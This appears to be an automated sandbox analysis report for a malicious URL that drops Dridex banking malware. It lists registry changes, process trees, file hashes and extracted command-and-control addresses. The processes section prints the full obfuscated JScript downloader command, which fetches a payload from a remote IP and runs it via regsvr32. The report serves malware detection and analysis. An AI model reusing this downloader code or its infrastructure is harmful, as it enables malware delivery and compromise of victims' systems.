Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-06-2021 05:06
Static task
static1
URLScan task
urlscan1
Sample
https://exitmagall.xyz/iduew73
Behavioral task
behavioral1
Sample
https://exitmagall.xyz/iduew73
Resource
win7v20210408
General
Malware Config
Extracted
dridex
10111
139.59.59.242:443
91.207.28.33:13786
178.128.197.110:4664
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 23 768 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
buc10.exepid process 4280 buc10.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
buc10.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA buc10.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{08EFC278-D24F-11EB-A11C-5E2E35FB59AE} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "331033814" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3717626721" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "331065806" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30893659" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30893659" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3725596527" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3717626721" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331017221" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30893659" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 4480 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 4480 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 4480 iexplore.exe 4480 iexplore.exe 4796 IEXPLORE.EXE 4796 IEXPLORE.EXE 4796 IEXPLORE.EXE 4796 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 4480 wrote to memory of 4796 4480 iexplore.exe IEXPLORE.EXE PID 4480 wrote to memory of 4796 4480 iexplore.exe IEXPLORE.EXE PID 4480 wrote to memory of 4796 4480 iexplore.exe IEXPLORE.EXE PID 4796 wrote to memory of 4016 4796 IEXPLORE.EXE cmd.exe PID 4796 wrote to memory of 4016 4796 IEXPLORE.EXE cmd.exe PID 4796 wrote to memory of 4016 4796 IEXPLORE.EXE cmd.exe PID 4016 wrote to memory of 768 4016 cmd.exe wscript.exe PID 4016 wrote to memory of 768 4016 cmd.exe wscript.exe PID 4016 wrote to memory of 768 4016 cmd.exe wscript.exe PID 768 wrote to memory of 4268 768 wscript.exe cmd.exe PID 768 wrote to memory of 4268 768 wscript.exe cmd.exe PID 768 wrote to memory of 4268 768 wscript.exe cmd.exe PID 4268 wrote to memory of 4280 4268 cmd.exe buc10.exe PID 4268 wrote to memory of 4280 4268 cmd.exe buc10.exe PID 4268 wrote to memory of 4280 4268 cmd.exe buc10.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew731⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4480 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c buc10.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\buc10.exebuc10.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
a64e2d26dd6f37ed569251d6dfc524ca
SHA18133be8cb0509b8e3ed907715e8df1785c555c6e
SHA2564ca0b012928887c383bce5a4a38f87e85ff1fc9720b0f5ad0aec0bec982e3cdc
SHA512a00f8a5ea363e36f56a309becc2faa3ccbf1c5c32671da78338b526d634b0f4c074d44a69280f5d6b629ec050a87950b1236ed7c2650abc1d26b9cdbd3cfbfdd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
5bbd3ec3dff6d6862e6593835cb7ee96
SHA10432100849d8e576738c47c29947bd75188a43d3
SHA2561976c6c5336d2617a01aca1ea9c37e54c16631f23393e202e54d9f6a42a6eebf
SHA512eb35fa3839aa265a457e89338ba150fd6c35a282aa047a3f6eef2fc484047ad24b4b6baf49f3a60538902a6082174037de6cc5f5141d52f6e0e883ec40bd5859
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LZQJAN73.cookieMD5
ca8b70c46725556f8dbe80a44b68ab16
SHA17e821dc28878b84c5def01256e70d720c6c17c0e
SHA256d06e61f584d0223a65a9acae6a3feb444bc299d3b840a9073b7bdbc7011484cf
SHA5123171e78ff7aaa94d3598bc5bb4ddb426fcd05e78f3d65f9a0d17f5b897f0c6d875b77fc98b63d58702621bf82c786faa2b66a2b9130f61de324f7ba756871133
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TGWWQG9R.cookieMD5
e2ebdfed3499bea3ba6fa6e756060948
SHA123be95d327bdb6c2bf26efc906560ea2ba3b6cab
SHA2561603d3f773d78c156c248fd19b7319736e7686cb4805e51beda8a66f5cf623b2
SHA51201133dada21698e2a35308f6acf0393078545aef43a647dfe1704a9d0b994f18c4e0b46f9e0c72446fbce9d8344890a2dca740186ec2c6f2a2efa2950c79db76
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\buc10.exeMD5
dea4a7e0d6430869ba9b80d841293e07
SHA134f609fcd39daae376fd266c7e57d099ecfe19d1
SHA2563339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69
SHA512f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a
-
C:\Users\Admin\AppData\Local\Temp\buc10.exeMD5
dea4a7e0d6430869ba9b80d841293e07
SHA134f609fcd39daae376fd266c7e57d099ecfe19d1
SHA2563339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69
SHA512f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a
-
memory/768-117-0x0000000000000000-mapping.dmp
-
memory/4016-116-0x0000000000000000-mapping.dmp
-
memory/4268-119-0x0000000000000000-mapping.dmp
-
memory/4280-120-0x0000000000000000-mapping.dmp
-
memory/4280-123-0x00000000020A0000-0x00000000020DC000-memory.dmpFilesize
240KB
-
memory/4280-124-0x0000000000400000-0x0000000000578000-memory.dmpFilesize
1.5MB
-
memory/4480-114-0x00007FF9EB810000-0x00007FF9EB87B000-memory.dmpFilesize
428KB
-
memory/4796-115-0x0000000000000000-mapping.dmp